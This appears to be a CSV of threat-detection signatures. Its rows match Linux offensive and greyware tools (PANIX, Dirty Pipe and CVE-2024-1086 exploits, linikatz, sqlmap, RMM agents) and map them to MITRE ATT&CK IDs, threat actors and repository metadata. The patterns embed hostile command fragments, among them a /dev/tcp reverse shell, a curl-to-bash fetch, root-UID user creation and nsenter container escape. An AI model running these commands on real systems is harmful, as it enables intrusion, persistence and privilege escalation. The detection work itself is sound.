"*sh -i >& /dev/tcp/*/1337 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/1337\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*ionice /bin/sh -p*",".{0,1000}ionice\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*sudo nsenter -t 1 -m -u -i -n -p -- su -*",".{0,1000}sudo\snsenter\s\-t\s1\s\-m\s\-u\s\-i\s\-n\s\-p\s\-\-\ssu\s\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*john.bash_completion*",".{0,1000}john\.bash_completion.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","#linux","N/A","N/A","10","10431","2114","2024-12-05T02:30:14Z","2011-12-16T19:43:47Z"
"*usage_backdoor_user*",".{0,1000}usage_backdoor_user.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*usage_initd_backdoor*",".{0,1000}usage_initd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*usage_malicious_docker_container*",".{0,1000}usage_malicious_docker_container.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*usage_malicious_package*",".{0,1000}usage_malicious_package.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*usage_motd_backdoor*",".{0,1000}usage_motd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*usage_package_manager_persistence*",".{0,1000}usage_package_manager_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*usage_rc_local_backdoor*",".{0,1000}usage_rc_local_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*usage_sudoers_backdoor*",".{0,1000}usage_sudoers_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*usage_suid_backdoor*",".{0,1000}usage_suid_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*usage_system_binary_backdoor*",".{0,1000}usage_system_binary_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*usermod -u 0 -o *",".{0,1000}usermod\s\-u\s0\s\-o\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"* parrot main *",".{0,1000}\sparrot\smain\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* parrot.run/*",".{0,1000}\sparrot\.run\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* parrot-backports *",".{0,1000}\sparrot\-backports\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* parrot-security *",".{0,1000}\sparrot\-security\s.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/deb.parrot.sh/*",".{0,1000}\/deb\.parrot\.sh\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/parrot/iso/*.iso*",".{0,1000}\/parrot\/iso\/.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/parrot-mirror/*",".{0,1000}\/parrot\-mirror\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/parrot-on-docker/*",".{0,1000}\/parrot\-on\-docker\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/parrotsec/*",".{0,1000}\/parrotsec\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*bunny.deb.parrot.sh/*",".{0,1000}bunny\.deb\.parrot\.sh\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*edge1.parrot.run*",".{0,1000}edge1\.parrot\.run.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*mirrors.aliyun.com/parrot*",".{0,1000}mirrors\.aliyun\.com\/parrot.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*parrot*security.vdi*",".{0,1000}parrot.{0,1000}security\.vdi.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*kerberos_steal*",".{0,1000}kerberos_steal.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","138","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z"
"*parrotsec.org/download/*",".{0,1000}parrotsec\.org\/download\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*Parrot-security-*.iso*",".{0,1000}Parrot\-security\-.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/pendulum.git*",".{0,1000}\/pendulum\.git.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","90","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z"
"*/src/pendulum.c*",".{0,1000}\/src\/pendulum\.c.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","90","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z"
"*/src/pendulum.h*",".{0,1000}\/src\/pendulum\.h.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","90","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z"
"*kyleavery/pendulum*",".{0,1000}kyleavery\/pendulum.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","90","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z"
"* looneypwner.sh*",".{0,1000}\slooneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z"
"*Lalin.sh *",".{0,1000}Lalin\.sh\s.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/LALIN","1","0","#linux","N/A","N/A","4","359","150","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z"
"*LastenServer server *",".{0,1000}LastenServer\sserver\s.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#linux","N/A","10","10","213","31","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z"
"*!! >> if you did this while in the root shell, the terminal will be messed up << !!*",".{0,1000}!!\s\>\>\sif\syou\sdid\sthis\swhile\sin\sthe\sroot\sshell,\sthe\sterminal\swill\sbe\smessed\sup\s\<\<\s!!.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*/CVE-2024-1086.git*",".{0,1000}\/CVE\-2024\-1086\.git.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","#linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*LEVEL_API_KEY=* bash -c ""$(curl -L *",".{0,1000}LEVEL_API_KEY\=.{0,1000}\sbash\s\-c\s\""\$\(curl\s\-L\s.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/LooneyPwner.git*",".{0,1000}\/LooneyPwner\.git.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z"
"*/looneypwner.sh*",".{0,1000}\/looneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z"
"*/tmp/exploit*",".{0,1000}\/tmp\/exploit.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*libxpc_mitm_ssudo.*",".{0,1000}libxpc_mitm_ssudo\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","34357","14025","2024-12-07T15:05:00Z","2011-08-30T06:13:20Z"
"*--file-read=/etc/passwd*",".{0,1000}\-\-file\-read\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","32786","5744","2024-12-04T09:08:04Z","2012-06-26T09:52:15Z"
"*[+] dropping suid shell*",".{0,1000}\[\+\]\sdropping\ssuid\sshell.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#content #linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*linikatz.sh*",".{0,1000}linikatz\.sh.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*linikatz.zip*",".{0,1000}linikatz\.zip.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*linikatzV2.sh*",".{0,1000}linikatzV2\.sh.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","138","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z"
"*Linux ITSM Agent/* -e /tmp/install.sh *",".{0,1000}Linux\sITSM\sAgent\/.{0,1000}\s\-e\s\/tmp\/install\.sh\s.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*[+] hacked the exterior layer of the datacenter mainframe*",".{0,1000}\[\+\]\shacked\sthe\sexterior\slayer\sof\sthe\sdatacenter\smainframe.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*[+] hijacking suid binary*",".{0,1000}\[\+\]\shijacking\ssuid\sbinary.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#content #linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*[+] overwriting modprobe_path with different PIDs *",".{0,1000}\[\+\]\soverwriting\smodprobe_path\swith\sdifferent\sPIDs\s.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*[+] popping root shell*",".{0,1000}\[\+\]\spopping\sroot\sshell.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#content #linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*[+] running normal privesc*",".{0,1000}\[\+\]\srunning\snormal\sprivesc.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
"*linux-smart-enumeration-master*",".{0,1000}linux\-smart\-enumeration\-master.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*[+] successfully breached the mainframe as real-PID *",".{0,1000}\[\+\]\ssuccessfully\sbreached\sthe\smainframe\sas\sreal\-PID\s.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2298","299","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z"
